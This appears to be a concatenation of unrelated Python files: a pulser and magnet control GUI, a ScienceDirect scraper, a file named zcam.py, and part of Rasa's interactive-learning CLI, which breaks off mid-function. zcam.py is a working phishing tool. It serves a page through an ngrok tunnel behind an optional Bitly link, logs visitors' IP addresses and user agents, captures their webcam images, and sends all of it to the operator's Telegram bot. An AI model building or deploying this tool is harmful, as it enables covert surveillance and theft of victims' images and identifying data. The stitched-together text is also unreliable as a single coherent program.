self.repetition_rate = str( self.Rep_rate.value() ) + ' Hz'
if self.laser_flag != 1:
self.pb.pulser_repetition_rate( self.repetition_rate )
self.update()
else:
self.repetition_rate = '10 Hz'
self.pb.pulser_repetition_rate( self.repetition_rate )
self.Rep_rate.setValue(10)
#self.update()
self.errors.appendPlainText( '10 Hz is a maximum repetiton rate with LASER pulse' )
def field(self):
"""
A function to change a magnetic field
"""
self.mag_field = float( self.Field.value() )
self.bh15.magnet_field( self.mag_field )
self.errors.appendPlainText( str( self.mag_field ) )
def stop(self):
"""
A function to clear pulses
"""
self.errors.clear()
self.pb.pulser_stop()
self.pb.pulser_clear()
def pulse_sequence(self):
"""
Pulse sequence from defined pulses
"""
if self.laser_flag != 1:
self.pb.pulser_repetition_rate( self.repetition_rate )
if int( self.p1_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P0', channel = self.p1_typ, start = self.p1_start, length = self.p1_length, \
phase_list = [ self.ph_1 ] )
if int( self.p2_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P1', channel = self.p2_typ, start = self.p2_start, length = self.p2_length, \
phase_list = [ self.ph_2 ] )
if int( self.p3_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P2', channel = self.p3_typ, start = self.p3_start, length = self.p3_length, \
phase_list = [ self.ph_3 ] )
if int( self.p4_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P3', channel = self.p4_typ, start = self.p4_start, length = self.p4_length, \
phase_list = [ self.ph_4 ] )
if int( self.p5_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P4', channel = self.p5_typ, start = self.p5_start, length = self.p5_length, \
phase_list = [ self.ph_5 ] )
if int( self.p6_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P5', channel = self.p6_typ, start = self.p6_start, length = self.p6_length, \
phase_list = [ self.ph_6 ] )
if int( self.p7_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P6', channel = self.p7_typ, start = self.p7_start, length = self.p7_length, \
phase_list = [ self.ph_7 ] )
else:
self.pb.pulser_repetition_rate( '10 Hz' )
self.Rep_rate.setValue(10)
# add q_switch_delay
self.p1_start = self.add_ns( int( self.remove_ns( self.p1_start ) ) + self.laser_q_switch_delay )
self.p3_start = self.add_ns( int( self.remove_ns( self.p3_start ) ) + self.laser_q_switch_delay )
self.p4_start = self.add_ns( int( self.remove_ns( self.p4_start ) ) + self.laser_q_switch_delay )
self.p5_start = self.add_ns( int( self.remove_ns( self.p5_start ) ) + self.laser_q_switch_delay )
self.p6_start = self.add_ns( int( self.remove_ns( self.p6_start ) ) + self.laser_q_switch_delay )
self.p7_start = self.add_ns( int( self.remove_ns( self.p7_start ) ) + self.laser_q_switch_delay )
if int( self.p1_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P0', channel = self.p1_typ, start = self.p1_start, length = self.p1_length, \
phase_list = [ self.ph_1 ] )
if int( self.p2_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P1', channel = self.p2_typ, start = self.p2_start, length = self.p2_length, \
phase_list = [ self.ph_2 ] )
if int( self.p3_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P2', channel = self.p3_typ, start = self.p3_start, length = self.p3_length, \
phase_list = [ self.ph_3 ] )
if int( self.p4_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P3', channel = self.p4_typ, start = self.p4_start, length = self.p4_length, \
phase_list = [ self.ph_4 ] )
if int( self.p5_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P4', channel = self.p5_typ, start = self.p5_start, length = self.p5_length, \
phase_list = [ self.ph_5 ] )
if int( self.p6_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P5', channel = self.p6_typ, start = self.p6_start, length = self.p6_length, \
phase_list = [ self.ph_6 ] )
if int( self.p7_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P6', channel = self.p7_typ, start = self.p7_start, length = self.p7_length, \
phase_list = [ self.ph_7 ] )
self.errors.appendPlainText( '165 us is added to all the pulses except the LASER pulse' )
# before adding pulse phases
##self.pb.pulser_update()
self.pb.pulser_next_phase()
# the next line gives rise to a bag with FC
#self.bh15.magnet_field( self.mag_field )
def update(self):
"""
A function to run pulses
"""
# TEST RUN
self.errors.clear()
self.parent_conn, self.child_conn = Pipe()
# a process for running test
self.test_process = Process( target = self.pulser_test, args = ( self.child_conn, 'test', ) )
self.test_process.start()
# in order to finish a test
time.sleep( 0.1 )
#print( self.test_process.exitcode )
if self.test_process.exitcode == 0:
self.test_process.join()
# RUN
self.pb.pulser_clear()
self.pb.pulser_test_flag('None')
self.bh15.magnet_setup( self.mag_field, 0.5 )
self.pulse_sequence()
#self.errors.appendPlainText( str( ans ) )
self.errors.appendPlainText( self.pb.pulser_pulse_list() )
else:
self.test_process.join()
self.pb.pulser_stop()
self.errors.appendPlainText( 'Incorrect pulse setting. Check that your pulses:\n' + \
'1. Not overlapped\n' + \
'2. Distance between MW pulses is more than 40 ns\n' + \
'3. Pulses are longer or equal to 12 ns\n' + \
'4. Field Controller is stucked\n' + \
'5. LASER pulse should not be in 208-232; 152-182; 102-126; <76 ns from first MW\n' + \
'\nPulser is stopped\n')
def pulser_test(self, conn, flag):
"""
Test run
"""
self.pb.pulser_clear()
self.pb.pulser_test_flag( flag )
self.pulse_sequence()
def turn_off(self):
"""
A function to turn off a programm.
"""
self.quit()
def help(self):
"""
A function to open a documentation
"""
pass
def main():
"""
A function to run the main window of the programm.
"""
app = QtWidgets.QApplication(sys.argv)
main = MainWindow()
main.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
journal_scraper.py
|
import logging
from get_sd_ou.classUtil import Journal, JournalsSearch, Volume, Article
from queue import Queue
from threading import Thread, current_thread, Lock
from get_sd_ou.databaseUtil import insert_article_data, init_db
from get_sd_ou.config import Config
def scrape_and_save_article(article_url_queue, mysql_connection):
first_url = article_url_queue.get()
article_url_queue.put(first_url)
while not article_url_queue.empty():
url = article_url_queue.get()
article_data, article_hash = scrape_article_url(url)
if not article_data is None:
save_article_to_db(article_data, mysql_connection)
article_url_queue.task_done()
add_to_persistance(article_hash, mysql_connection)
logger.info(f"[{current_thread().name}] - Article scraped and saved - url = {url}")
else:
logger.info(f"[{current_thread().name}] skipped article: {url}")
def scrape_article_url(url):
article = Article(url=url)
article_hash = str(article).strip()
if not article_hash in visited:
article_data = article.get_article_data()
logger.debug(f"thread: ({current_thread().name})[journal_scraper]-[scrape_article_url] | {url}")
return article_data, article_hash
return None, None
def save_article_to_db(article_data, db_connection):
article_id = insert_article_data(**article_data, cnx=db_connection)
logger.debug(f"thread: ({current_thread().name})[journal_scraper]-[save_article_to_db] | {article_id}")
def get_node_children(node, **kwargs):
if node == "ROOT":
yield from iterate_journal_searches(kwargs.get('start_letter', ''), kwargs.get('end_letter', 'z'))
elif isinstance(node, JournalsSearch):
yield from node.iterate_journals()
elif isinstance(node, Journal):
yield from node.iterate_volumes()
elif isinstance(node, Volume):
articles = node.get_articles()
for article in articles:
yield article
else:
raise Exception(f"Invalid node - ({type(node)}) - {node}")
def iterate_journal_searches(start_letter="", endletter="z"):
while start_letter <= endletter:
journal_search = JournalsSearch(letter=start_letter)
while journal_search:
yield journal_search
journal_search = journal_search.get_next_page()
start_letter = chr(ord(start_letter)+1)
def deep_first_search_for_articles(self_node, article_url_queue, mysql_connection, **kwargs):
if not str(self_node) in visited:
node_children = get_node_children(self_node, **kwargs)
if isinstance(self_node, Volume): # deepest node of tree before articles is Volume
articles = list(node_children)
a = [add_to_persistance(str(self_node).strip(), mysql_connection) for self_node in articles]
# list(map(article_url_queue.put, articles))
else:
for child in node_children:
deep_first_search_for_articles(self_node=child, article_url_queue=article_url_queue, mysql_connection=mysql_connection, **kwargs)
add_to_persistance(str(self_node).strip(), mysql_connection)
logger.info(f"[{current_thread().name}] Got node children: [{type(self_node)}] {str(self_node).strip()}")
else:
logger.info(f"[{current_thread().name}] skipped node: {str(self_node)}")
def init_persistance():
mysql_connection = init_db()
mysql_cursor = mysql_connection.cursor()
results = mysql_cursor.execute("CREATE TABLE if not exists sciencedirect.visited (hash VARCHAR(512) UNIQUE);")
mysql_connection.commit()
print("persistance made")
return mysql_connection
def add_to_persistance(item, cnx):
lock.acquire()
visited.add(str(item))
lock.release()
cursor = cnx.cursor()
# res = cursor.execute(f"INSERT INTO sciencedirect.visited (hash) VALUES ('%s');", str(item))
res = cursor.execute(f"INSERT IGNORE INTO sciencedirect.visited VALUES (%s);", (str(item), ))
cnx.commit()
def write_visited(write_set, mysql_connection=None):
res = None
cursor = mysql_connection.cursor()
for i in write_set:
res = cursor.execute(f'INSERT INTO sciencedirect.visited VALUES (hash) ({str(i)});')
mysql_connection.commit()
print(res)
def load_visited(mysql_connection=None):
cursor = mysql_connection.cursor()
cursor.execute('SELECT hash FROM sciencedirect.visited;')
res = [i[0] for i in cursor.fetchall()]
return set(res)
if __name__ == "__main__":
logger = logging.getLogger('mainLogger')
logger.setLevel(Config.LOG_LEVEL)
mysql_connection = init_persistance()
file_data = load_visited(mysql_connection)
visited = file_data if file_data else set()
lock = Lock()
article_queue = Queue(maxsize=Config.QUEUE_MAX_SIZE)
start_letter = Config.START_LETTER
end_letter = Config.END_LETTER
search_thread = Thread(target=deep_first_search_for_articles,
args=("ROOT", article_queue, mysql_connection), kwargs={"start_letter":start_letter, "end_letter":end_letter})
try:
search_thread.start()
search_thread.join()
# for i in range(Config.THREADS_COUNT):
# mysql_connection = init_persistance()
# t = Thread(target=scrape_and_save_article, args=(article_queue, mysql_connection))
# t.start()
# article_queue.join()
except Exception as e:
print(e)
print("EXCEPTION")
|
zcam.py
|
#!/usr/bin/python3
from telebot import types
import telebot
from constraints import API_KEY, BITLY_ACCESS_TOKEN, ngrok_auth_token
import threading
from flask import Flask, render_template, request
from datetime import datetime
import base64
import os
from pyngrok import ngrok
import pyfiglet
import logging
import pyshorteners
import requests
try:
# telegram
bot = telebot.TeleBot(API_KEY, parse_mode=None)
# bitly
s = pyshorteners.Shortener(api_key=BITLY_ACCESS_TOKEN)
# colors
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# banner
result = pyfiglet.figlet_format("Z-CAM")
print(f"{bcolors.OKBLUE}{result}{bcolors.ENDC}")
print(f"\t\t\t {bcolors.BOLD}Github: @sankethj{bcolors.ENDC}")
print("")
# disable unwanted logs
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
os.environ["FLASK_ENV"] = "development"
app = Flask(__name__)
app.debug = False
fport = 5000
# webhook port
PORT = int(os.environ.get('PORT', 5000))
# ngrok auth-token
ngrok.set_auth_token(ngrok_auth_token)
public_url = ngrok.connect(fport).public_url
final_ngrok = public_url[:4] + "s" + public_url[4:]
# url shorten or not
shorten = input(f"{bcolors.WARNING} Do you want to use Bitly to shorten url link? ['y' or 'n']: {bcolors.ENDC}")
if shorten == 'y' or shorten == 'Y' or shorten == 'Yes' or shorten =='yes':
final_ngrok = s.bitly.short(final_ngrok)
else:
final_ngrok = final_ngrok
# telegram bot building
tgbot = input(f"{bcolors.WARNING} Do you want telegram bot support? ['y' or 'n']: {bcolors.ENDC}")
if tgbot == 'y' or tgbot == 'Y' or tgbot == 'Yes' or tgbot =='yes':
@bot.message_handler(commands=["link"])
def send_link_and_image(msg):
bot.reply_to(msg, final_ngrok)
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["shorten_link"])
def send_shortend_link(msg):
s_final_ngrok = s.bitly.short(final_ngrok)
bot.reply_to(msg, s_final_ngrok)
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["start"])
def send_start_message(msg):
bot.reply_to(msg,"Welcome.....ZCam tool is for Eductaional purpose only. Use /help for more info. Support @Team_ETF for more..... JOIN: https://youtube.com/channel/UCJnx0yDhcTLWM3ZrAtSvaIw")
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["help"])
def send_help_message(msg):
bot.reply_to(msg,"Use /menu for menu window. Use /link to get ngrok link. Use /shorten_link to get bitly masked link.")
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["menu"])
def show_menu_page(msg):
markup = types.ReplyKeyboardMarkup(row_width=1)
btn1 = types.KeyboardButton("/start")
btn2 = types.KeyboardButton("/link")
btn3 = types.KeyboardButton("/shorten_link")
btn4 = types.KeyboardButton("/help")
markup.add(btn1,btn2,btn3,btn4)
bot.send_message(chat_id=msg.chat.id, text="Choose from menu", reply_markup=markup)
global user_id
user_id = msg.chat.id
else:
pass
#final ngrok link
print(f" * ngrok tunnel link -> {bcolors.OKCYAN}{final_ngrok}{bcolors.ENDC}")
app.config["BASE_URL"] = public_url
# flask
@app.route("/",methods=['POST','GET'])
def home():
# get request
if request.method == 'GET':
now = str(datetime.now())
req = requests.get('http://localhost:4040/api/requests/http').json()
user_agent = req['requests'][0]['request']['headers']['User-Agent'][0]
ip_address = req['requests'][0]['request']['headers']['X-Forwarded-For'][0]
# writing file
file1 = open('myfile.txt', 'a')
file1.write("Date and Time:\t")
file1.write(str(now))
file1.write("\nIP:\t")
file1.write(str(ip_address))
file1.write("\nUser-Agent:\t")
file1.write(str(user_agent))
file1.write("\n\n")
file1.close()
# sending log message to telegram bot
log_msg = "Time: "+ str(now) +" "+"IP_ADDRESS: "+ str(ip_address) +" "+"USER-AGENT: "+ str(user_agent)
to_url2 = "https://api.telegram.org/bot"+ API_KEY +"/sendMessage?chat_id="+ str(user_id) +"&text="+ str(log_msg)
requests.get(to_url2)
print(f"{now} \t {bcolors.OKCYAN}{ip_address}{bcolors.ENDC} \t {user_agent}\t")
# post request
elif request.method == 'POST':
now = str(datetime.now())
# setting path to save file in capture dir
save_path = 'capture'
file_name = 'img_'+now+'.png'
completeName = os.path.join(save_path, file_name)
# requesting base64 image data
req_data = request.get_json()
encoded = req_data['canvasData']
# writing file
file2 = open(completeName, 'wb')
data = base64.b64decode(encoded)
file2.write(data)
file2.close()
print(f"{bcolors.OKGREEN}[{bcolors.ENDC}+{bcolors.OKGREEN}] Cam image recieved.{bcolors.FAIL} \n ")
# sending photo to telegram bot
data = {"chat_id": user_id, "caption": ""}
to_url = 'https://api.telegram.org/bot{}/sendPhoto'.format(API_KEY)
with open(completeName, "rb") as image_file:
requests.post(to_url, data=data, files={"photo": image_file})
return render_template("saycheese.html")
# threading to run flask with pyngrok smoothly
threading.Thread(target=app.run, kwargs={"use_reloader": False}).start()
bot.polling()
except KeyboardInterrupt:
print(f"{bcolors.FAIL} Ending task.....\n")
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import (
Any, Callable, Dict, List, Optional, Text, Tuple, Union)
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, events, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels import UserMessage
from rasa.core.channels.channel import button_to_string, element_to_string
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT, DEFAULT_SERVER_PORT, DEFAULT_SERVER_URL,
REQUESTED_SLOT)
from rasa.core.domain import Domain
from rasa.core.events import (
ActionExecuted, BotUttered, Event, Restarted, UserUttered)
from rasa.core.interpreter import (
INTENT_MESSAGE_PREFIX,
NaturalLanguageInterpreter)
from rasa.core.trackers import EventVerbosity
from rasa.core.training import visualization
from rasa.core.training.structures import Story
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH, visualize_neighborhood)
from rasa.core.utils import AvailableEndpoints, EndpointConfig
# noinspection PyProtectedMember
from rasa_nlu.training_data.loading import _guess_format, load_data
from rasa_nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml"}
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
sender_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"message": message,
"parse_data": parse_data
}
return await endpoint.request(json=payload,
method="post",
subpath="/conversations/{}/messages"
"".format(sender_id))
async def request_prediction(
endpoint: EndpointConfig,
sender_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(method="post",
subpath="/conversations/{}/predict".format(
sender_id))
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(method="get",
subpath="/domain",
headers={"Accept": "application/json"})
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
sender_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = "/conversations/{}/tracker?include_events={}".format(
sender_id, verbosity.name)
return await endpoint.request(method="get",
subpath=path,
headers={"Accept": "application/json"})
async def send_action(
endpoint: EndpointConfig,
sender_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = "/conversations/{}/execute".format(sender_id)
try:
return await endpoint.request(json=payload,
method="post",
subpath=subpath)
except ClientError:
if is_new_action:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"which was not successfully executed. "
"If this action does not return any events, "
"you do not need to do anything. "
"If this is a custom action which returns events, "
"you are recommended to implement this action "
"in your action server and try again."
"".format(action_name))
await _ask_questions(warning_questions, sender_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, sender_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
sender_id: Text,
evt: Dict[Text, Any]
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = "/conversations/{}/tracker/events".format(sender_id)
return await endpoint.request(json=evt,
method="post",
subpath=subpath)
async def replace_events(
endpoint: EndpointConfig,
sender_id: Text,
evts: List[Dict[Text, Any]]
) -> Dict[Text, Any]:
"""Replace all the events of a conversation with the provided ones."""
subpath = "/conversations/{}/tracker/events".format(sender_id)
return await endpoint.request(json=evts,
method="put",
subpath=subpath)
async def send_finetune(
endpoint: EndpointConfig,
evts: List[Dict[Text, Any]]
) -> Dict[Text, Any]:
"""Finetune a core model on the provided additional training samples."""
return await endpoint.request(json=evts,
method="post",
subpath="/finetune")
def format_bot_output(
message: Dict[Text, Any]
) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.get("text") or ""
# Then, append all additional items
data = message.get("data", {})
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
for idx, button in enumerate(data.get("buttons")):
button_str = button_to_string(button, idx)
output += "\n" + button_str
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(
evts: List[Dict[Text, Any]]
) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(evts)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
evts: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(evts)):
if e.get("event") == UserUttered.type_name:
return evts[:-(i + 1)]
return evts
async def _ask_questions(
questions: Union[Form, Question],
sender_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(sender_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Text]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions,
key=lambda k: (-k['confidence'], k['name']))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(p.get("confidence"),
p.get("name"))
choice = {
"name": name_with_confidence,
"value": p.get("name")
}
choices.append(choice)
return choices
async def _request_free_text_intent(
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.text("Please type the intent name")
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_action(
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.text("Please type the action name")
return await _ask_questions(question, sender_id, endpoint)
async def _request_selection_from_intent_list(
intent_list: List[Dict[Text, Text]],
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intent_list)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]],
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?",
choices=forks)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_from_user(
sender_id,
endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means, the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(list(reversed(choices)),
sender_id,
endpoint)
if fork_idx is not None:
return tracker.get("events", [])[:int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message,
intents,
sender_id,
endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data",
{}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = ([{"name": "<create_new_intent>", "value": OTHER_INTENT}] +
_selection_choices_from_intent_prediction(predictions))
intent_name = await _request_selection_from_intent_list(choices,
sender_id,
endpoint)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(sender_id, endpoint)
return {"name": intent_name, "confidence": 1.0}
# returns the selected intent with the original probability value
return next((x for x in predictions if x["name"] == intent_name), None)
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
evts = tracker_dump.get("events", [])
table = _chat_history_table(evts)
slot_strs = _slot_history(tracker_dump)
print("------")
print("Chat History\n")
print(table)
if slot_strs:
print("\n")
print("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
print("------")
def _chat_history_table(evts: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt, max_width):
return "\n".join(textwrap.wrap(txt, max_width,
replace_whitespace=False))
def colored(txt, color):
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_evt, max_width):
_parsed = user_evt.get('parse_data', {})
_intent = _parsed.get('intent', {}).get("name")
_confidence = _parsed.get('intent', {}).get("confidence", 1.0)
_md = _as_md_message(_parsed)
_lines = [
colored(wrap(_md, max_width), "hired"),
"intent: {} {:03.2f}".format(_intent, _confidence)
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
["# ",
Color(colored('Bot ', 'autoblue')),
" ",
Color(colored('You ', 'hired'))],
]
table = SingleTable(table_data, 'Chat History')
bot_column = []
for idx, evt in enumerate(evts):
if evt.get("event") == ActionExecuted.type_name:
bot_column.append(colored(evt['name'], 'autocyan'))
if evt['confidence'] is not None:
bot_column[-1] += (
colored(" {:03.2f}".format(evt['confidence']),
'autowhite'))
elif evt.get("event") == UserUttered.type_name:
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(evt, user_width(table))
add_user_cell(table_data, msg)
elif evt.get("event") == BotUttered.type_name:
wrapped = wrap(format_bot_output(evt), bot_width(table))
bot_column.append(colored(wrapped, 'autoblue'))
else:
e = Event.from_parameters(evt)
if e.as_story_string():
bot_column.append(wrap(e.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: 'left', 1: 'left', 2: 'center', 3: 'right'}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots").items():
colored_value = cliutils.wrap_with_color(str(s),
rasa.cli.utils.bcolors.WARNING)
slot_strs.append("{}: {}".format(k, colored_value))
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, sender_id)
evts = tracker.get("events", [])
await _write_stories_to_file(story_path, evts)
await _write_nlu_to_file(nlu_path, evts)
await _write_domain_to_file(domain_path, evts, endpoint)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit")]).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(sender_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]],
sender_id: Text, endpoint: EndpointConfig
) -> (Text, bool):
"""Ask the user to correct an action prediction."""
await _print_history(sender_id, endpoint)
choices = [{"name": "{:03.2f} {:40}".format(a.get("score"),
a.get("action")),
"value": a.get("action")}
for a in predictions]
choices = ([{"name": "<create new action>", "value": OTHER_ACTION}] +
choices)
question = questionary.select("What is the next action of the bot?",
choices)
action_name = await _ask_questions(question, sender_id, endpoint)
is_new_action = action_name == OTHER_ACTION
if is_new_action:
action_name = await _request_free_text_action(sender_id, endpoint)
print("Thanks! The bot will now run {}.\n".format(action_name))
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"]),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"]),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"]),
)
answers = questions.ask()
if not answers:
raise Abort()
return (answers["export_stories"],
answers["export_nlu"],
answers["export_domain"])
def _split_conversation_at_restarts(
evts: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in evts:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(evts: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
from rasa_nlu.extractors.duckling_http_extractor import \
DucklingHTTPExtractor
from rasa_nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
from rasa_nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
msgs = []
for evt in evts:
if evt.get("event") == UserUttered.type_name:
